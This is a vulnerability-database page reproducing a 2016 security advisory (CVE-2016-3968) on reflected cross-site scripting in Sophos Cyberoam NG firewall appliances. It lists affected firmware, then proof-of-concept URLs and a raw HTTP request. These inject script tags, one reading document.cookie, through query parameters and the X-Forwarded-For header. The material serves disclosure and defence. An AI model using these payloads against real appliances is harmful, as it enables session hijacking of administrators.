Sophos Cyberoam NG Series Multiple Cross-Site Scripting Vulnerabilities

🗓️ 04 Apr 2016 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 91 Views

Sophos Cyberoam NG Series XSS Vulnerabilitie

Reporter	Title	Published	Views	Family All 7
CNVD	Sophos Cyberoam Cross-Site Scripting Vulnerability in Multiple Products	7 Apr 201600:00	–	cnvd
CVE	CVE-2016-3968	6 Apr 201618:00	–	cve
Cvelist	CVE-2016-3968	6 Apr 201618:00	–	cvelist
EUVD	EUVD-2016-4977	7 Oct 202500:30	–	euvd
NVD	CVE-2016-3968	6 Apr 201618:59	–	nvd
Prion	Cross site scripting	6 Apr 201618:59	–	prion
RedhatCVE	CVE-2016-3968	22 May 202509:07	–	redhatcve

<html><body><p>Sophos Cyberoam NG Series Multiple Cross-Site Scripting Vulnerabilities


Vendor: Sophos Technologies Pvt. Ltd.
Product web page: http://www.cyberoam.com
Affected version: Model: CR100iNG, FW: 10.6.3 MR-1 (Build 503)
                  Model: CR35iNG, FW: 10.6.2 MR-1 (Build 383)
                  Model: CR35iNG, FW: 10.6.2 (Build 378)

Summary: Cyberoam NG series of Unified Threat Management appliances are
the Next-Generation network security appliances that include UTM security
features along with performance required for future networks. The NG series
for SMEs are the 'fastest UTMs' made for this segment. The best-in-class
hardware along with software to match, enables the NG series to offer unmatched
throughput speeds, compared to any other UTM appliance in this market segment.
This assures support for future IT trends in organizations like high-speed
Internet and rising number of devices in organizations – offering future-ready
security to SMEs.

Desc: Multiple reflected XSS issues were discovered in Cyberoam NG appliances.
Input passed via the 'ipFamily', 'applicationname' and 'username' GET parameters
to LiveConnections.jsp and LiveConnectionDetail.jsp is not properly sanitised
before being returned to the user. Adding arbitrary 'X-Forwarded-For' HTTP header
to a request makes the appliance also prone to a XSS issue. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: Linux


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5313
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5313.php

Vendor: https://docs.cyberoam.com/default.asp?id=447&amp;Lang=1&amp;SID=


29.01.2016

--


#1
https://127.0.0.2/corporate/webpages/trafficdiscovery/LiveConnections.jsp?ipFamily=1';alert(1)//&amp;popup=0&amp;t=Fri%20Jan%2029%202016%2014:17:10%20GMT+0100%20(Central%20European%20Standard%20Time)

#2
https://127.0.0.2/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0<script>alert(1)</script>&amp;applicationname=GTALK%2520ANDROID<script>alert(2)</script>&amp;username=NA<script>alert(3)</script>

#3
GET /corporate/webpages/index.jsp HTTP/1.1
Host: 127.0.0.2
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: https://127.0.0.2/corporate/webpages/index.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=7ee4qwuyt6yl1uayrqtw6qrmu
X-Forwarded-For: 127.0.0.1<script>alert(document.cookie)</script>

--

HTTP/1.1 200 OK
...
...
<script language="javascript">	
	Cyberoam.setContextPath('/corporate');
	Cyberoam.LoggedInUserIP = "127.0.0.1</script><script>alert(document.cookie)</script>, 10.0.0.2";
	Cyberoam.images = "themes/lite1/images";
	Cyberoam.language = "English";
	Cyberoam.version = "10.06 build 3503";
...
...
</p></body></html>

04 Apr 2016 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 24.3

CVSS 36.1

EPSS0.00094